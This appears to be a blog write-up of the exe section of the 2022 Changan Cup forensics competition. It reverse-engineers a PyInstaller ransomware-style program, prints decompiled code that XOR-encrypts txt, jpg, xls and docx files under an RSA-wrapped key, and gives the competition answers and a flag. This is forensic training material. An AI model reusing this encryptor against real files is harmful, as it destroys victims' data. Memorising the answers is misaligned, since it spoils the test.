2022年第四届长安杯电子取证竞赛-exe部分
exe分析
分析所有掌握的检材,找到勒索邮件中被加密的文档和对应的加/解密程序,并回答下列问题
41. 分析加密程序,编译该加密程序使用的语言是
python
42. 分析加密程序,它会加密哪些扩展名的文件?
pyinstaller逆向
python3.10.8报warning了,后面改用了python3.6.8
才发现上面python版本好像报warning了,换了python3.6.8
在解析生成的encrypt_file.exe_extracted
目录中的PYZ-00.pyz_extracted
目录随便找一个.pyc
文件复制前12字节16进制到encrypt_file_1
前面
修改后缀为.pyc
PS C:\Users\12827\Desktop> uncompyle6.exe -o C:\Users\12827\Desktop\encrypt_file.py C:\Users\12827\Desktop\22CACUP\encrypt_file.exe_extracted\encrypt_file_1.pyc
C:\Users\12827\Desktop\22CACUP\encrypt_file.exe_extracted\encrypt_file_1.pyc --
# Successfully decompiled filexxxxxxxxxx C:\Users\12827\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\Scripts> PS C:\Users\12827\Desktop> uncompyle6.exe -o C:\Users\12827\Desktop\encrypt_file.py C:\Users\12827\Desktop\22CACUP\encrypt_file.exe_extracted\encrypt_file_1.pycC:\Users\12827\Desktop\22CACUP\encrypt_file.exe_extracted\encrypt_file_1.pyc --# Successfully decompiled file
查看py文件
if '.txt' == ExtensionPath or '.jpg' == ExtensionPath or '.xls' == ExtensionPath or '.docx' == ExtensionPath:time.sleep(3)data_file = os.path.join(filepath, filename)rsakey = RSA.import_key(pubkey)cipher = Cipher_pkcs1_v1_5.new(rsakey)xor_key = os.urandom(16)xor_obj = XORCBC(xor_key)outf = open(data_file + '_encrypted', 'wb')encrypted_xor_key = cipher.encrypt(xor_key)outf.write(encrypted_xor_key)buffer_size = 4096with open(data_file, 'rb') as (f):while True:data = f.read(buffer_size)if not data:breakoutf.write(xor_obj.encrypt(data))
txt、jpg、xls、docx
43. 分析加密程序,是通过什么算法对文件进行加密的?
class XORCBC:def __init__(self, key: bytes):self.key = bytearray(key)self.cur = 0def encrypt(self, data: bytes) -> bytes:data = bytearray(data)for i in range(len(data)):tmp = data[i]data[i] ^= self.key[self.cur]self.key[self.cur] = tmpself.cur = (self.cur + 1) % len(self.key)return bytes(data)
XOR
44. 分析加密程序,其使用的非对称加密方式公钥后5位为?
pubkey = '-----BEGIN PUBLIC KEY-----\nMIIBIzANBgkqhkiG9w0BAQEFAAOCARAAMIIBCwKCAQEAx5JF4elVDBaakgGeDSxI\nCO1LyyZ6B2TgR4DNYiQoB1zAyWPDwektaCfnvNeHURBrw++HvbuNMoQNdOJNZZVo\nbHVZh+rCI4MwAh+EBFUeT8Dzja4ZlU9E7jufm69TQS0PSseIiU/4Byd2i9BvIbRn\nHLFZvi/VXphGeW0qVeHkQ3Ll6hJ2fUGhTsuGLc1XXHfiZ4RbJY/AMnjYPy9CaYzi\nSOT4PCf/O12Kuu9ZklsIAihRPl10SmM4IRnVhZYYpXedAyTcYCuUiI4c37F5GAhz\nRDFn9IQ6YQRjlLjuOX8WB6H4NbnKX/kd0GsQP3Zbogazj/z7OM0Y3rv3T8mtF6/I\nkwIEHoau+w==\n-----END PUBLIC KEY-----\n'
u+w==
45. 被加密文档中,FLAG1的值是(FLAG为8位字符串,如“FLAG9:QWERT123”)
使用同样的方法逆向decrypt_file.exe
使用密码解密
TREFWGFS
2022年第四届长安杯电子取证竞赛-exe部分相关推荐
- 2022第四届长安杯电子取证竞赛 服务器赛时思路题解 Zodi4c
2022 长安杯 服务器赛时做题思路备忘 Zodi4c VC容器密码为:2022.4th.changancup! 我赛时的做题思路和关心老师的讲解基本一致,只是没了上帝视角,本人只开了服务器,所以案件 ...
- 第四届长安杯电子取证大赛个人总结
第四届长安杯电子取证竞赛个人总结 P1ANT731 第四届长安杯竞赛检材VC容器SHA256计算 PS E:\2022Changancup> certutil -hashfile E:\2022 ...
- 2020第二届长安杯电子数据竞赛试题(二次修改版),本人亲解,尽量做到细致仔细,镜像百度网盘奉上,建议大家联系一下,弘连题目还是很好的(强烈推荐)
百度云链接 链接:https://pan.baidu.com/s/1iEItwBUZx6X4_oe_ZfQlvw?pwd=ybww 提取码:ybww -来自百度网盘超级会员V2的分享 如果链接失效了, ...
- 第二届“长安杯”电子数据竞赛试题wp
话不多说,案情
- 2022第四届长安杯wp
目录 背景 检材一 1. 检材1的SHA256值为 2. 分析检材1,搭建该服务器的技术员IP地址是多少?用该地址解压检材2 3. 检材1中,操作系统发行版本号为 4. 检材1系统中,网卡绑定的静态I ...
- 【“到此一游”系列】(菜鸡参加“美亚杯” 电子取证大赛感受)
到此一游 -- 美亚杯 感受及经验 背景 比赛现场 1. 上午八点二十 2. 九点 3. 十一点 我的比赛过程 比赛经验 我的思路是 1. 第一步 2. 第二步 3.第三步 注 结尾 感受及经验 背景 ...
- 盘古石杯电子取证比赛WP
"盘古石杯"电子取证比赛WP 写在前面 刚刚比完了比赛,觉得自己还有很多东西没做过,现在趁着写WP的时候顺便复盘一下,望各位大佬指正. 2023年5月4日中午收到短信通知告诉我可以 ...
- 2019年第五届 美亚杯电子取证 团体赛 wp
2019年第五届 美亚杯电子取证 团体赛 wp 案情 路由器 Win1.E01 Win3.E01 L:\Group_Competition\Hacker_Linux\Linux1 MacBookAir ...
- 2022第四届长安杯复盘(WP)
2022长安杯案情背景:某地警方接到受害人报案称其在某虚拟币交易网站遭遇诈骗,该网站号称使用"USTD币"购买所谓的"HT币",受害人充值后不但 " ...
最新文章
- Oracle-数据库对象(index、synonsym、view、sequence、tablespace)
- JavaScript学习笔记(5)
- 【机器学习基础】数学推导+纯Python实现机器学习算法7:神经网络
- JavaScript浏览器的对象
- Android 日夜间切换Demo
- VirtualBox启动虚拟机出错VT-x disable
- 2019-05-23 嗅探工具;影音嗅探;IRIS嗅探器;
- HAL库与标准库的理解
- 新手如何有效的刷算法题(LeetCode)
- 【语音识别】基于动态时间规整(DTW)的孤立字语音识别Matlab源码
- TSP问题(贪心法)最近邻点和最短连接
- vim的复制、粘贴操作
- ffmpeg生成dash点播
- 用机器学习算法来求取战斗力公式
- python编程练习:提取Visual MODFLOW水均衡数据(.ZOT)文件至表格
- 拼音反查(转自大富翁)
- Kubernetes 学习总结(21)—— 深入理解 Kubernetes 中的 DeamonSet
- Cloudflare免费更换节点,加速你的网站
- cityscapes数据集
- autosar can协议栈 源码解读_AUTOSAR架构的CAN通讯